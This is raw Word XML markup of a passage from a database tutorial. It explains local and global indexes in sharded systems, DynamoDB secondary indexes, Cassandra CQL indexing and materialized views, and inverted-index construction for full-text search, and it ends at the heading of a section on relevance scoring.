    <w:p w14:paraId="17078FCF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="0000545F">
          <v:rect id="_x0000_i5331" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824B39F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Indexing in Distributed Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530B8FCF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Local Indexes (Per-Partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D98E91D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In a sharded/partitioned system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E33F378" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A103F33" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Shard 1 (customer_id 1–1000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C556410" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Table data for customers 1–1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ECA02A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Local index on (customer_id, order_date) — only covers this shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC949BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="571ED9BC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Shard 2 (customer_id 1001–2000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593E7B9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Table data for customers 1001–2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D89A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Local index on (customer_id, order_date) — only covers this shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C06EFFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queries by partition key (customer_id): efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — hit one shard, use its local index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71317D59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queries NOT by partition key (e.g., by email): SCATTER-GATHER</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — must query ALL shards, merge results. Expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2A144" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Global Indexes (Cross-Partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041170C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A separate index that spans all partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1FD87C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0D93F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Global index on email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B3BAC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "alice@ex.com" → Shard 1, row_id 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D2401" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "bob@ex.com" → Shard 2, row_id 789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B1134" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "charlie@ex.com" → Shard 1, row_id 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FE5BC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query by email:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Look up global index → know exactly which shard → single shard query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D4239" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The catch: write amplification and consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2783F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Every write must update BOTH the local data AND the global index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BE652" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Global index is on a different node → distributed transaction or eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450FC509" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>If global index is partitioned differently than data → cross-partition coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906BDAB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DynamoDB's Global Secondary Indexes (GSI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A702F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>GSI is a separate table (different partition key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C29A043" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Replicated asynchronously from the base table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F5FEB6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Eventually consistent with the base table (reads from GSI may be slightly stale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3953D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Writes are free from the application's perspective (DynamoDB handles replication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455198F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>12.3 Indexing in Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666661B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>cql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BED052" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Primary key determines data distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A876C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE TABLE orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A0577" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  customer_id UUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0734B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  order_date TIMESTAMP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483EA4D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  order_id UUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C04E96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  total DECIMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43939653" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  PRIMARY KEY ((customer_id), order_date, order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFAD316" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248099CF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- (customer_id) = partition key (determines which node stores the data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499511E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- order_date, order_id = clustering columns (determines sort order WITHIN partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C9F192" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="364549AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query: WHERE customer_id = ? AND order_date &gt; ? → Efficient (single-partition, sorted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B28514F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query: WHERE total &gt; 100 → REQUIRES full cluster scan (total is not in PK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C406E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1F49EFDD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Secondary index (local to each node):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283B53E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON orders(total);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD020F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Still requires scatter-gather across all nodes (each checks its local index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D4E113" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="31CB77C3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Materialized view (Cassandra's approach to global indexing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE3001" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE MATERIALIZED VIEW orders_by_total AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C449118" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  SELECT * FROM orders WHERE total IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F33C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  PRIMARY KEY ((total), customer_id, order_date, order_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F29FB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Pre-computes a view partitioned by total → efficient for WHERE total = ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE595A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="27B16BF9">
          <v:rect id="_x0000_i5332" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAA2824" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>13. Full-Text Search Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2C112" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Inverted Index — The Foundation of Text Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545C122" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600EF6EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39234660" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 1: "The quick brown fox jumps over the lazy dog"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FA2C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 2: "The quick red car"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F244DDD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 3: "A lazy brown cat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBD926" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7D5653AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Step 1: Tokenization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D521FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Doc 1 tokens: [the, quick, brown, fox, jumps, over, the, lazy, dog]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5285B06A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Doc 2 tokens: [the, quick, red, car]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCDB3B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Doc 3 tokens: [a, lazy, brown, cat]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07735755" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6EEA1D09" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Step 2: Normalization (lowercase, stemming, stop-word removal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2668D536" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Doc 1: [quick, brown, fox, jump, lazi, dog]  (stemmed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC844AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Doc 2: [quick, red, car]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF3BFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Doc 3: [lazi, brown, cat]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC8FDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="04179A95" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Step 3: Build inverted index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891E753" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "brown" → [doc1: pos[3], doc3: pos[2]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064208A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "car"   → [doc2: pos[3]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C410941" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "cat"   → [doc3: pos[3]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CC227" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "dog"   → [doc1: pos[6]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22812D35" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "fox"   → [doc1: pos[4]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B01854" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "jump"  → [doc1: pos[5]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA232B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "lazi"  → [doc1: pos[6], doc3: pos[1]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7FAAE1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "quick" → [doc1: pos[1], doc2: pos[1]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB803C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "red"   → [doc2: pos[2]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D035970" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query: "quick brown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AD6C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5EA03A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>"quick" → [doc1, doc2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235CEA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>"brown" → [doc1, doc3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5545A0A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Intersection: [doc1] ← contains both terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3010A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 TF-IDF and BM25 — Relevance Scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC0ADF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
